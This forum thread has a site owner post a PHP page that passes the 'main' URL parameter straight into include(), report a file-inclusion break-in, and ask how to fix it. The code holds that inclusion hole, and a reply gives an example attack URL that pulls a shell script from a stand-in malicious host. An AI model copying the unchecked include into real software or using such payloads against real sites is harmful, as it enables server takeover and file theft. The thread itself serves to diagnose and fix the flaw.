<?php
$nav = 'people';
include 'navigation/htmlhead.php';
?>


<body>

<div id="wrap">

<?php

// add a line to check for allowed $nav values.


include 'navigation/header.php';
include 'navigation/nav.php';

if (!isset($_GET['main'])) {
$main = 'default';
}

else {
$main = $_GET['main'];
}


include ($nav.'/sidebar.php');
include ($nav.'/'.$main.'.php');
$filename=$nav.'/'.$main.'.php';


include 'navigation/footer.php';

?>


</div>


</body>
</html>


this is the code. it seems someone actually entered on my server with Local File Inclusion and was able to upload some files on my server without my permission. What should i change in this code so the people wont be able to see my /etc/passwd file ? Actually they can see it !
Thanks a lot
who helps me , i pay 10$ paypal

I'm not sure this resolves your problem, but you'll need to check for allowed values for $main since any value could be passed by the user within $_GET['main']. i.e. main=../admin/admin_script.html or similar, may cause security issues.

i dont get u... im not well in php

try using separate if statement for the value allowed to your $_GET['main'] yours is like if $_GET['main'] value isnt specified accept anything i can execute a remote script with your code

eg. http://victim.com/index.php?main=http://www.malicious.com/shell.php?